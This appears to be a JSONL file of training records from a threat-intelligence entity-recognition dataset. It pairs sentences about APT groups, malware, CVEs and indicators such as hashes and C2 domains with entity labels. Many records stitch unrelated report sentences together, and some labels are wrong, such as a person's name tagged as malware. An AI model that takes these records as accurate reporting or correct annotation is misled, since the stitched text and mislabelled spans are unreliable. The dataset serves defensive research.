Most modules were created in 2012 .", "spans": {"TOOL: NetTraveler trojan": [[4, 22]]}, "info": {"id": "cyberner_stix_train_005843", "source": "cyberner_stix_train"}} {"text": "The GeminiDuke toolset consists of a core information stealer , a loader and multiple persistencerelated components .", "spans": {"MALWARE: GeminiDuke": [[4, 14]], "TOOL: information stealer": [[42, 61]], "TOOL: loader": [[66, 72]], "TOOL: multiple persistencerelated components": [[77, 115]]}, "info": {"id": "cyberner_stix_train_005844", "source": "cyberner_stix_train"}} {"text": "In 2017 and early 2018 , the group used PowerShell commands to call Mimikatz from an online PowerSploit repository , which is a collection of publicly available PowerShell modules for penetration testing . Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": {"TOOL: PowerShell commands": [[40, 59]], "TOOL: Mimikatz": [[68, 76]], "TOOL: PowerShell modules": [[161, 179]], "ORGANIZATION: Palo Alto Networks AutoFocus": [[235, 263]]}, "info": {"id": "cyberner_stix_train_005845", "source": "cyberner_stix_train"}} {"text": "Sandworm Team went to ground shortly after being exposed in October of 2014 , and malware with Dune references ( the genesis for the ' Sandworm ' moniker ) which we had previously used to track them disappeared entirely . 
The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat .", "spans": {"THREAT_ACTOR: Sandworm Team": [[0, 13]], "THREAT_ACTOR: Sandworm": [[135, 143]], "ORGANIZATION: specific individuals": [[305, 325]], "VULNERABILITY: zero-day": [[366, 374]]}, "info": {"id": "cyberner_stix_train_005846", "source": "cyberner_stix_train"}} {"text": "Although we are unable to provide details in support of such attribution , previous work by security vendor FireEye suggests the group might be of Russian origin , however no evidence allows to tie the attacks to governments of any particular country .", "spans": {"ORGANIZATION: FireEye": [[108, 115]]}, "info": {"id": "cyberner_stix_train_005847", "source": "cyberner_stix_train"}} {"text": "The Dukes have employed exploits both in their infection vectors as well as in their malware .", "spans": {"THREAT_ACTOR: Dukes": [[4, 9]]}, "info": {"id": "cyberner_stix_train_005848", "source": "cyberner_stix_train"}} {"text": "In the case of Android devices , accessing the malicious website or pressing any of the buttons will prompt the download of the APK . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors . Glimpse is a PowerShell script that is executed silently by Visual Basic . 
The victims in this campaign a government in Asia and a telecommunications company in the Middle East do align with the kinds of victims we often see Budworm targeting .", "spans": {"SYSTEM: Android": [[15, 22]], "THREAT_ACTOR: APT1": [[175, 179]], "THREAT_ACTOR: cyber threat actors": [[254, 273]], "MALWARE: Glimpse": [[276, 283]], "TOOL: PowerShell": [[289, 299]], "TOOL: Visual Basic": [[336, 348]], "ORGANIZATION: a government in Asia": [[380, 400]], "ORGANIZATION: a telecommunications company in the Middle East": [[405, 452]], "THREAT_ACTOR: Budworm": [[501, 508]]}, "info": {"id": "cyberner_stix_train_005849", "source": "cyberner_stix_train"}} {"text": "It is ROPless , and instead constructs a fake vtable for a FileReference object that is modified for each call to a Windows API .", "spans": {"TOOL: ROPless": [[6, 13]], "SYSTEM: Windows": [[116, 123]], "TOOL: API": [[124, 127]]}, "info": {"id": "cyberner_stix_train_005850", "source": "cyberner_stix_train"}} {"text": "The new variant caught our attention because it ’ s an advanced malware with unmistakable malicious characteristic and behavior and yet manages to evade many available protections , registering a low detection rate against security solutions . Beginning in early March 2018 , Unit 42 started observing targeted attacks against Russian , Spanish and United States government agencies operating in Pakistan . Not yet implemented cases ( e.g , Darkrace specifically targets Windows operating systems and has several similarities to LockBit .", "spans": {"ORGANIZATION: Unit 42": [[276, 283]], "ORGANIZATION: government agencies": [[363, 382]], "MALWARE: Darkrace": [[441, 449]], "SYSTEM: Windows operating systems": [[471, 496]], "THREAT_ACTOR: LockBit": [[529, 536]]}, "info": {"id": "cyberner_stix_train_005851", "source": "cyberner_stix_train"}} {"text": "Ports 6203 and 6204 : Facebook extraction service . 
Secondary ProjectSauron modules are designed to perform specific functions like stealing documents , recording keystrokes , and hijacking encryption keys from both infected computers and attached USB sticks . While some are more neutral , quoting from newspapers and the media , others seem to report fake news to spread misinformation that serves a political agenda . Ways our customers can detect and block this threat are listed below .", "spans": {"ORGANIZATION: Facebook": [[22, 30]], "TOOL: ProjectSauron modules": [[62, 83]]}, "info": {"id": "cyberner_stix_train_005852", "source": "cyberner_stix_train"}} {"text": "After the the first instance of BrainTest was detected , Google removed the app from Google Play . The Word document usually exploits CVE-2012-0158 . We have also observed APT10 use DLL search order hijacking and sideloading , to execute some modified versions of open-source tools .", "spans": {"MALWARE: BrainTest": [[32, 41]], "ORGANIZATION: Google": [[57, 63]], "SYSTEM: Google Play": [[85, 96]], "MALWARE: Word document": [[103, 116]], "VULNERABILITY: CVE-2012-0158": [[134, 147]], "THREAT_ACTOR: APT10": [[172, 177]]}, "info": {"id": "cyberner_stix_train_005853", "source": "cyberner_stix_train"}} {"text": "The operation , known as FASTCash” has enabled Lazarus to fraudulently empty ATMs of cash . In March 2018 we detected an ongoing campaign .", "spans": {"THREAT_ACTOR: Lazarus": [[47, 54]]}, "info": {"id": "cyberner_stix_train_005854", "source": "cyberner_stix_train"}} {"text": "No zero-day vulnerabilities were used to breach targeted networks , instead \" TG-3390 relied on old vulnerabilities such as CVE-2011-3544 \" — a near-year-old Java security hole — \" and CVE-2010-0738 to compromise their targets \" , Dell SecureWorks' researchers reported . 
The Winnti umbrella and closely associated entities has been active since at least 2009 .", "spans": {"VULNERABILITY: zero-day vulnerabilities": [[3, 27]], "VULNERABILITY: CVE-2011-3544": [[124, 137]], "VULNERABILITY: CVE-2010-0738": [[185, 198]], "ORGANIZATION: Dell SecureWorks'": [[231, 248]], "MALWARE: Winnti": [[276, 282]]}, "info": {"id": "cyberner_stix_train_005855", "source": "cyberner_stix_train"}} {"text": "It is possible these names were used in spear phishing emails because they would seem benign to Saudi-based employees and lure them to open the attachment .", "spans": {"TOOL: emails": [[55, 61]]}, "info": {"id": "cyberner_stix_train_005856", "source": "cyberner_stix_train"}} {"text": "Ports 8080 and 5900 are common ports used with legitimate protocols , but can be abused by attackers when they are not secured .", "spans": {}, "info": {"id": "cyberner_stix_train_005857", "source": "cyberner_stix_train"}} {"text": "Of course , not all the opcodes are can be easily read and understood due to additional steps that the authors have taken to make analysis extremely complicated . It is highly likely the Lotus Blossom used spear-phishing attacks containing links to these malicious documents as a delivery mechanism . Winnti : 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f https://nw.infestexe.com/version/last.php . 
By understanding the TTPs of the leaked source codes , defenders will gain invaluable insights that are helpful in identifying and mitigating any existing security weakness in their environment and improving their security defense against these attack vectors .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[187, 200]], "THREAT_ACTOR: Winnti": [[301, 307]], "FILEPATH: 8272c1f41f7c223316c0d78bd3bd5744e25c2e9f": [[310, 350]], "URL: https://nw.infestexe.com/version/last.php": [[351, 392]]}, "info": {"id": "cyberner_stix_train_005858", "source": "cyberner_stix_train"}} {"text": "During patching , the Trojan will overwrite the existing code with malicious code so that all it can do is execute /system/bin/ip . It appears the Desert Falcons sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . If you want to be a savvy and safe traveler , it ’s highly recommended to use a virtual payment card for reservations made via OTAs , as these cards normally expire after one charge . 
The MiniDuke attackers are still active at this time and have created malware as recently as February 20 , 2013 .", "spans": {"THREAT_ACTOR: Desert Falcons": [[147, 161]], "ORGANIZATION: National Liberation Front": [[411, 436]], "TOOL: OTAs": [[588, 592]], "THREAT_ACTOR: MiniDuke attackers": [[649, 667]]}, "info": {"id": "cyberner_stix_train_005859", "source": "cyberner_stix_train"}} {"text": "Our Quasar RAT will connect to our own ( secured , of course ) Quasar serve , allowing us to control that attacker ’s server with his own RAT .", "spans": {"MALWARE: Quasar RAT": [[4, 14]], "MALWARE: Quasar": [[63, 69]], "TOOL: RAT": [[138, 141]]}, "info": {"id": "cyberner_stix_train_005860", "source": "cyberner_stix_train"}} {"text": "The Trojan functions primarily as a downloader that relies on emails to communicate between the Trojan and the C2 server .", "spans": {"MALWARE: Trojan": [[4, 10], [96, 102]], "TOOL: emails": [[62, 68]], "TOOL: C2": [[111, 113]]}, "info": {"id": "cyberner_stix_train_005861", "source": "cyberner_stix_train"}} {"text": "PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . 
Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[0, 12]], "THREAT_ACTOR: group": [[39, 44]], "ORGANIZATION: Government": [[106, 116]], "ORGANIZATION: Defense": [[119, 126]], "ORGANIZATION: Research": [[129, 137]], "ORGANIZATION: Technology sectors": [[144, 162]], "ORGANIZATION: US Defense": [[217, 227]], "ORGANIZATION: satellite": [[241, 250]], "ORGANIZATION: aerospace industries": [[255, 275]], "MALWARE: Potao": [[278, 283]], "MALWARE: malware": [[408, 415]]}, "info": {"id": "cyberner_stix_train_005862", "source": "cyberner_stix_train"}} {"text": "WolfRAT application screen The Google GMS and Firebase service has been added , however , no configuration has been found , even though services seem to be referenced in the of a new class . t's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost . 
Both the THREEBYTE and HIGHTIDE backdoors were written to the same filepath of C:\\DOCUMENTS and SETTINGS\\{user}\\LOCAL SETTINGS\\Temp\\word.exe ; Spearphishing Attachment APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims.002 Phishing : Spearphishing Link APT29 has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.003 Phishing : Spearphishing via Service APT29 has used the legitimate mailing service Constant Contact to send phishing e - mails .003", "spans": {"MALWARE: WolfRAT": [[0, 7]], "SYSTEM: Google GMS": [[31, 41]], "SYSTEM: Firebase": [[46, 54]], "TOOL: DNS-based attack technique": [[216, 242]], "ORGANIZATION: Arbor 's ASERT Team": [[373, 392]], "MALWARE: THREEBYTE": [[438, 447]], "MALWARE: HIGHTIDE backdoors": [[452, 470]], "FILEPATH: SETTINGS\\Temp\\word.exe": [[547, 569]], "THREAT_ACTOR: Spearphishing Attachment APT29": [[572, 602]], "THREAT_ACTOR: Spearphishing Link APT29": [[717, 741]], "THREAT_ACTOR: Spearphishing via Service APT29": [[874, 905]]}, "info": {"id": "cyberner_stix_train_005863", "source": "cyberner_stix_train"}} {"text": "Dragos does not corroborate nor conduct political attribution to threat activity . Of note , this methodology of naming abstracts aACT the \" who \" element – XENOTIME may represent a single discrete entity ( such as a Russian research institution ) or several entities working in coordination in a roughly repeatable , similar manner across multiple events .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "THREAT_ACTOR: XENOTIME": [[157, 165]], "ORGANIZATION: research institution": [[225, 245]]}, "info": {"id": "cyberner_stix_train_005864", "source": "cyberner_stix_train"}} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . 
the US had data stolen by members of Emissary Panda .", "spans": {"ORGANIZATION: Unit 42": [[29, 36]], "MALWARE: EPS files": [[109, 118]], "VULNERABILITY: CVE-2015-2545": [[133, 146]], "VULNERABILITY: CVE-2017-0261": [[151, 164]], "THREAT_ACTOR: Emissary Panda": [[220, 234]]}, "info": {"id": "cyberner_stix_train_005865", "source": "cyberner_stix_train"}} {"text": "– a possible misspelling of the “ Opera ”", "spans": {"TOOL: Opera": [[34, 39]]}, "info": {"id": "cyberner_stix_train_005866", "source": "cyberner_stix_train"}} {"text": "FakeSpy is an information stealer that exfiltrates and sends SMS messages , steals financial and application data , reads account information and contact lists , and more . APT10 frequently targets the Southeast Asia region . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": {"MALWARE: FakeSpy": [[0, 7]], "THREAT_ACTOR: APT10": [[173, 178]], "MALWARE: VNC": [[274, 277]], "TOOL: C2": [[321, 323]]}, "info": {"id": "cyberner_stix_train_005867", "source": "cyberner_stix_train"}} {"text": "The decoy document is a flyer concerning the Cyber Conflict U.S. conference with the following filename Conference_on_Cyber_Conflict.doc .", "spans": {"FILEPATH: Conference_on_Cyber_Conflict.doc": [[104, 136]]}, "info": {"id": "cyberner_stix_train_005868", "source": "cyberner_stix_train"}} {"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . 
The other one , \" Operation Erebus \" employs an older exploit , for CVE-2016-4117 and leverages watering holes .", "spans": {"VULNERABILITY: Heartbleed vulnerability": [[31, 55]], "VULNERABILITY: exploit": [[155, 162]], "VULNERABILITY: CVE-2016-4117": [[169, 182]]}, "info": {"id": "cyberner_stix_train_005869", "source": "cyberner_stix_train"}} {"text": "APT28 ’s already wide-ranging capabilities and tactics are continuing to grow and refine as the group expands its infection vectors .", "spans": {"THREAT_ACTOR: APT28": [[0, 5]]}, "info": {"id": "cyberner_stix_train_005870", "source": "cyberner_stix_train"}} {"text": "A decoy document is deployed in this attack , with the contents purporting be a publicly available document from the United Nations regarding the Republic of Uzbekistan .", "spans": {}, "info": {"id": "cyberner_stix_train_005871", "source": "cyberner_stix_train"}} {"text": "] ee Backend server October 8 , 2020 Sophisticated new Android malware marks the latest evolution of mobile ransomware Attackers are persistent and motivated to continuously evolve – and no platform is immune . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas . the immediate values used in comparison look different from assigned ones . COSMICENERGY accomplishes this via its two derivative components , which we track as PIEHOP and LIGHTWORK ( see appendices for technical analyses ) .", "spans": {"SYSTEM: Android": [[55, 62]], "THREAT_ACTOR: attackers": [[240, 249]], "THREAT_ACTOR: Gorgon Group": [[297, 309]], "MALWARE: COSMICENERGY": [[445, 457]], "TOOL: PIEHOP": [[530, 536]], "TOOL: LIGHTWORK": [[541, 550]]}, "info": {"id": "cyberner_stix_train_005872", "source": "cyberner_stix_train"}} {"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well . 
While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday . In addition to the documents , the content includes a number of political cartoons that criticize Hamas ’ relations with Iran and Hamas ’ standing as a resistance movement . Facebook stated that the attackers also pretended to work in hospitality , medicine , journalism , NGOs , or airlines , sometimes conversing with their targets for months with profiles across various social media platforms .", "spans": {"TOOL: hacktools": [[168, 177]], "ORGANIZATION: Facebook": [[423, 431]]}, "info": {"id": "cyberner_stix_train_005873", "source": "cyberner_stix_train"}} {"text": "Impact T1516 Input Injection Can enter text and perform clicks on behalf of user . The first observed evidence of Waterbug activity came on January 11 , 2018 , when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network . KONNI : A Malware Under The Radar For Years .", "spans": {"THREAT_ACTOR: Waterbug": [[114, 122]], "MALWARE: KONNI": [[278, 283]], "TOOL: Radar": [[306, 311]]}, "info": {"id": "cyberner_stix_train_005874", "source": "cyberner_stix_train"}} {"text": "The exploit installs Silence’s loader , designed to download backdoors and other malicious programs . Corkow provided remote access to the ITS-Broker system terminal by 《 Platforma soft 》 Ltd. , which enabled the fraud to be committed .", "spans": {"VULNERABILITY: exploit": [[4, 11]], "THREAT_ACTOR: Silence’s": [[21, 30]], "MALWARE: Corkow": [[102, 108]]}, "info": {"id": "cyberner_stix_train_005875", "source": "cyberner_stix_train"}} {"text": "] it The rise of mobile banker Asacub 28 AUG 2018 We encountered the Trojan-Banker.AndroidOS.Asacub family for the first time in 2015 , when the first versions of the malware were detected , analyzed , and found to be more adept at spying than stealing funds . 
In comparison , XENOTIME was defined based on principles of infrastructure ( compromised third-party infrastructure and various networks associated with several Russian research institutions ) , capabilities ( publicly- and commercially-available tools with varying levels of customization ) and targeting ( an issue not meant for discussion in this blog ) . The Pierogi backdoor discovered by Cybereason during this investigation seems to be undocumented and gives the threat actors espionage capabilities over their victims . Indicators of Compromise vs. Indicators of Attack", "spans": {"MALWARE: Asacub": [[31, 37]], "MALWARE: Trojan-Banker.AndroidOS.Asacub": [[69, 99]], "THREAT_ACTOR: XENOTIME": [[277, 285]], "ORGANIZATION: research institutions": [[430, 451]], "MALWARE: Pierogi backdoor": [[624, 640]], "ORGANIZATION: Cybereason": [[655, 665]]}, "info": {"id": "cyberner_stix_train_005876", "source": "cyberner_stix_train"}} {"text": "This sample is packed by “ Netz ” , a simple .NET Framework packer which stores the original executable compressed ( zlib ) as a resource .", "spans": {"TOOL: Netz": [[27, 31]], "TOOL: .NET": [[45, 49]]}, "info": {"id": "cyberner_stix_train_005877", "source": "cyberner_stix_train"}} {"text": "The components were an unexpected inclusion in this particular toolset .", "spans": {}, "info": {"id": "cyberner_stix_train_005878", "source": "cyberner_stix_train"}} {"text": "We expect to see more diversification in the social engineering lures this threat group employs as time goes on . APT38 , in particular , is strongly distinguishable because of its specific focus on financial institutions and operations that attempt to use SWIFT fraud to steal millions of dollars at a time . 
In order to perform the deobfuscation , Facebook has spotted that same malware being used in this most recent campaign , but this operation has a far broader set of infection techniques and targets outside of the Middle East .", "spans": {"THREAT_ACTOR: APT38": [[114, 119]], "ORGANIZATION: financial institutions": [[199, 221]], "TOOL: SWIFT": [[257, 262]], "ORGANIZATION: Facebook": [[350, 358]], "MALWARE: malware": [[381, 388]], "ORGANIZATION: targets outside of the Middle East": [[500, 534]]}, "info": {"id": "cyberner_stix_train_005879", "source": "cyberner_stix_train"}} {"text": "IoT devices are purposefully designed to connect to a network and many are simply connected to the internet with little management or oversight.Some IoT devices may even communicate basic telemetry back to the device manufacturer or have means to receive software updates .", "spans": {"TOOL: IoT": [[0, 3], [149, 152]]}, "info": {"id": "cyberner_stix_train_005880", "source": "cyberner_stix_train"}} {"text": "We identified new MSIL components deployed by Zebrocy .", "spans": {"TOOL: MSIL": [[18, 22]], "MALWARE: Zebrocy": [[46, 53]]}, "info": {"id": "cyberner_stix_train_005881", "source": "cyberner_stix_train"}} {"text": "The use of the CARBANAK malware in FIN7 operations also provides limited evidence that these campaigns are linked to previously observed CARBANAK operations leading to fraudulent banking transactions , ATM compromise , and other monetization schemes . 
PCH is a nonprofit entity based in northern California that also manages significant amounts of the world 's DNS infrastructure , particularly the DNS for more than 500 top-level domains and a number of the Middle East top-level domains targeted by DNSpionage .", "spans": {"TOOL: CARBANAK malware": [[15, 31]], "THREAT_ACTOR: FIN7": [[35, 39]], "ORGANIZATION: banking transactions": [[179, 199]]}, "info": {"id": "cyberner_stix_train_005882", "source": "cyberner_stix_train"}} {"text": "The HTA files contained job descriptions and links to job postings on popular employment websites . The final remaining known decoy includes photos of Chitpas Tant Kridakon ( Figure 7 ) , who is known as heiress to the largest brewery in Thailand .", "spans": {"MALWARE: HTA files": [[4, 13]], "MALWARE: decoy": [[126, 131]], "MALWARE: Chitpas Tant Kridakon": [[151, 172]]}, "info": {"id": "cyberner_stix_train_005883", "source": "cyberner_stix_train"}} {"text": "The 24 target apps belong to 7 different Spanish banks : Caixa bank , Bankinter , Bankia , BBVA , EVO Banco , Kutxabank and Santander . Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd , the MSS has conducted an unprecedented campaign , dubbed Operation Cloud Hopper , ” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients . 
These reports discussed the group ’s malware , Daserf ( a.k.a Muirim or Nioupale ) and some additional downloader programs .", "spans": {"SYSTEM: Caixa bank": [[57, 67]], "SYSTEM: Bankinter": [[70, 79]], "SYSTEM: Bankia": [[82, 88]], "SYSTEM: BBVA": [[91, 95]], "SYSTEM: EVO Banco": [[98, 107]], "SYSTEM: Kutxabank": [[110, 119]], "SYSTEM: Santander": [[124, 133]], "THREAT_ACTOR: MSS": [[252, 255]], "MALWARE: Daserf": [[516, 522]], "MALWARE: Muirim": [[531, 537]], "MALWARE: Nioupale": [[541, 549]]}, "info": {"id": "cyberner_stix_train_005884", "source": "cyberner_stix_train"}} {"text": "In addition , the malware samples included the kasper PDB string reported by Unit 42 , prompting us to conclude that we were likely looking at new variants of KASPERAGENT .", "spans": {"ORGANIZATION: Unit 42": [[77, 84]], "MALWARE: KASPERAGENT": [[159, 170]]}, "info": {"id": "cyberner_stix_train_005885", "source": "cyberner_stix_train"}} {"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network . Despite multiple public disclosures of their activities , BRONZE UNION remains an active and formidable threat as of this publication .", "spans": {}, "info": {"id": "cyberner_stix_train_005886", "source": "cyberner_stix_train"}} {"text": "CARBANAK malware has been used heavily by FIN7 in previous operations . 
The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": {"TOOL: CARBANAK": [[0, 8]], "THREAT_ACTOR: FIN7": [[42, 46]], "THREAT_ACTOR: admin@338": [[76, 85]], "MALWARE: Poison Ivy RAT": [[103, 117]], "MALWARE: WinHTTPHelper": [[122, 135]], "MALWARE: malware": [[136, 143]], "ORGANIZATION: government officials": [[175, 195]]}, "info": {"id": "cyberner_stix_train_005887", "source": "cyberner_stix_train"}} {"text": "] it Brescia server1cs.exodus.connexxa [ . ЦНИИХМ ) , a Russian government-owned technical research institution located in Moscow . The GUID generated by the malware is saved in a file called GUID.bin . If the main function is called with only , it will only perform its cleanup routine and immediately terminate .", "spans": {"ORGANIZATION: research institution": [[91, 111]], "TOOL: GUID": [[136, 140]], "FILEPATH: GUID.bin": [[192, 200]]}, "info": {"id": "cyberner_stix_train_005888", "source": "cyberner_stix_train"}} {"text": "AntSword webshell has no functionality other than running a script provided by the AntSword Shell Manager , specifically within a field named Darr1R1ng of an HTTP POST request .", "spans": {"TOOL: AntSword": [[0, 8], [83, 91]], "TOOL: Shell Manager": [[92, 105]]}, "info": {"id": "cyberner_stix_train_005889", "source": "cyberner_stix_train"}} {"text": "Let ’ s take an in-depth look at Asacub 5.0.3 , the most widespread version in 2018 . In activity analyzed by CTU researchers , TG-3390 executed the Hunter web application scanning tool against a target server running IIS . However , while we observed the presence of the codes , the functions of upd , sync and aptitude were disabled in the kits ’ latest version . 
This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": {"MALWARE: Asacub": [[33, 39]], "ORGANIZATION: CTU": [[110, 113]], "THREAT_ACTOR: TG-3390": [[128, 135]], "TOOL: Hunter web application scanning tool": [[149, 185]]}, "info": {"id": "cyberner_stix_train_005890", "source": "cyberner_stix_train"}} {"text": "The names used for Android components are similar : Similarities with AnubisSimilarities with Anubis When analyzing these components , similarities were found in the code of both malware families : Similarities with Anubis Another major change that indicated that the actor copied code from the Anubis Trojan is the way of handling configuration values . They also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . One of subdomains , news.softfix.co.kr was the C2 server of Daserf ( 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423 ) .", "spans": {"SYSTEM: Android": [[19, 26]], "MALWARE: Anubis": [[94, 100], [295, 301]], "SYSTEM: Anubis": [[216, 222]], "TOOL: Visma": [[475, 480]], "TOOL: Dropbox API": [[496, 507]], "DOMAIN: news.softfix.co.kr": [[530, 548]], "TOOL: C2": [[557, 559]], "MALWARE: Daserf": [[570, 576]], "FILEPATH: 9c7a34390e92d4551c26a3feb5b181757b3309995acd1f92e0f63f888aa89423": [[579, 643]]}, "info": {"id": "cyberner_stix_train_005891", "source": "cyberner_stix_train"}} {"text": "A full list of all possible commands with descriptions can be found in Appendix II below . On February 28 , the McAfee discovered that the cybercrime group HIDDEN COBRA continues to target cryptocurrency and financial organizations . APT33 : a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT . 
Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"ORGANIZATION: McAfee": [[112, 118]], "THREAT_ACTOR: cybercrime group": [[139, 155]], "THREAT_ACTOR: HIDDEN COBRA": [[156, 168]], "ORGANIZATION: cryptocurrency": [[189, 203]], "ORGANIZATION: financial organizations": [[208, 231]], "THREAT_ACTOR: APT33": [[234, 239]], "MALWARE: a23c182349f17398076360b2cb72e81e5e23589351d3a6af59a27e1d552e1ec0 S-SHA2 Quasar RAT": [[242, 324]], "MALWARE: fake / rogue anti - virus products": [[419, 453]]}, "info": {"id": "cyberner_stix_train_005892", "source": "cyberner_stix_train"}} {"text": "Additional pivoting based on artifacts unique to this malware family expanded our dataset to hundreds of samples used over the last several years .", "spans": {}, "info": {"id": "cyberner_stix_train_005893", "source": "cyberner_stix_train"}} {"text": "A new class was added called com.utils.RestClient . Chafer , uses Backdoor.Remexi.B . Similarly , WATERSPOUT is a newly discovered backdoor and the threat actors behind the campaign have not been positively identified . Derusbi has used unencrypted HTTP on port 443 for C2.[12 ]", "spans": {"TOOL: Backdoor.Remexi.B": [[66, 83]], "MALWARE: WATERSPOUT": [[98, 108]], "MALWARE: Derusbi": [[220, 227]]}, "info": {"id": "cyberner_stix_train_005894", "source": "cyberner_stix_train"}} {"text": "simple CLI interface that ask when started for IP ,Port and proxy configuration to generate the initial payloads .", "spans": {"TOOL: CLI": [[7, 10]]}, "info": {"id": "cyberner_stix_train_005895", "source": "cyberner_stix_train"}} {"text": "We assume it was rushed because , unlike GlanceLove , it lacked any real obfuscation . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia . 
Using the VirusTotal Graph functionality these variants could be organized into several groups that were commonly associated by either metadata or document structures like macros or embedded image files ( depicted in the image below ) . None on the CrowdStrike Falcon ® console and of the market - leading CrowdStrike Falcon ® platform in action .", "spans": {"MALWARE: GlanceLove": [[41, 51]], "THREAT_ACTOR: APT32": [[97, 102]], "MALWARE: Vietnam.exe": [[201, 212]], "ORGANIZATION: diaspora": [[272, 280]], "TOOL: VirusTotal Graph": [[311, 327]], "TOOL: CrowdStrike Falcon": [[550, 568], [607, 625]]}, "info": {"id": "cyberner_stix_train_005896", "source": "cyberner_stix_train"}} {"text": "Charger was found embedded in an app called EnergyRescue . Silence also used Russian-language web hosting services . FIN7 ’s last campaigns were targeting banks in Europe and Central America . Monitor for contextual data about a file , which may include information such as name , the content ( ex : signature , headers , or data / media ) , user / ower , permissions that may attempt to hide artifacts associated with their behaviors to evade detection .", "spans": {"MALWARE: Charger": [[0, 7]], "MALWARE: EnergyRescue": [[44, 56]], "TOOL: web hosting services": [[94, 114]], "THREAT_ACTOR: FIN7": [[117, 121]]}, "info": {"id": "cyberner_stix_train_005897", "source": "cyberner_stix_train"}} {"text": "Gooligan potentially affects devices on Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop ) , which is over 74 % of in-market devices today . The APT38 uses DYEPACK to manipulate the SWIFT transaction records and hide evidence of the malicious transactions , so bank personnel are none the wiser when they review recent transactions . 
another determines global variables , Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": {"MALWARE: Gooligan": [[0, 8]], "SYSTEM: Android 4 ( Jelly Bean , KitKat ) and 5 ( Lollipop )": [[40, 92]], "THREAT_ACTOR: APT38": [[147, 152]], "TOOL: DYEPACK": [[158, 165]], "ORGANIZATION: bank personnel": [[263, 277]], "THREAT_ACTOR: Dukes": [[393, 398]]}, "info": {"id": "cyberner_stix_train_005898", "source": "cyberner_stix_train"}} {"text": ". The Advanced Threat Research team uncovered activity related to this campaign in March 2018 , when the actors targeted Turkish banks . APT33 : a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor . This rule was designed to match the decoded URI of any incoming request with the regex , so when the decoded URI matches this regex , the request is dropped .", "spans": {"ORGANIZATION: Advanced Threat Research": [[6, 30]], "THREAT_ACTOR: actors": [[105, 111]], "ORGANIZATION: banks": [[129, 134]], "THREAT_ACTOR: APT33": [[137, 142]], "MALWARE: a67461a0c14fc1528ad83b9bd874f53b7616cfed99656442fb4d9cdd7d09e449 S-SHA2 AutoIt backdoor": [[145, 232]]}, "info": {"id": "cyberner_stix_train_005899", "source": "cyberner_stix_train"}} {"text": "The tool is written in C# whose malicious code exists in a namespace called cannon , which is the basis of the Trojan ’s name .", "spans": {"TOOL: C#": [[23, 25]], "MALWARE: cannon": [[76, 82]], "MALWARE: Trojan": [[111, 117]]}, "info": {"id": "cyberner_stix_train_005900", "source": "cyberner_stix_train"}} {"text": "] it Catania server3.exodus.connexxa [ . XENOTIME configured TRISIS based on the specifics and functions of the Triconex system within the industrial control ( ICS ) environment . 
Uploading data ( mainly screenshots ) to the C2 : The leaked tooling included a Python script , , that when executed led CrowdStrike researchers to replicate the logs generated in recent Play ransomware attacks .", "spans": {"THREAT_ACTOR: XENOTIME": [[41, 49]], "TOOL: TRISIS": [[61, 67]], "TOOL: ICS": [[160, 163]], "TOOL: C2": [[225, 227]], "VULNERABILITY: leaked tooling included a Python script , , that when executed": [[234, 296]]}, "info": {"id": "cyberner_stix_train_005901", "source": "cyberner_stix_train"}} {"text": "While investing a lot of resources in the development of this malware , the actor behind “ Agent Smith ” does not want a real update to remove all of the changes made , so here is where the “ patch ” module comes in to play With the sole purpose of disabling automatic updates for the infected application , this module observes the update directory for the original application and removes the file once it appears . Last week we discussed Numbered Panda , a group that is also based out of China and is fairly well known to the security community , though by many names . These executables are monitoring services for 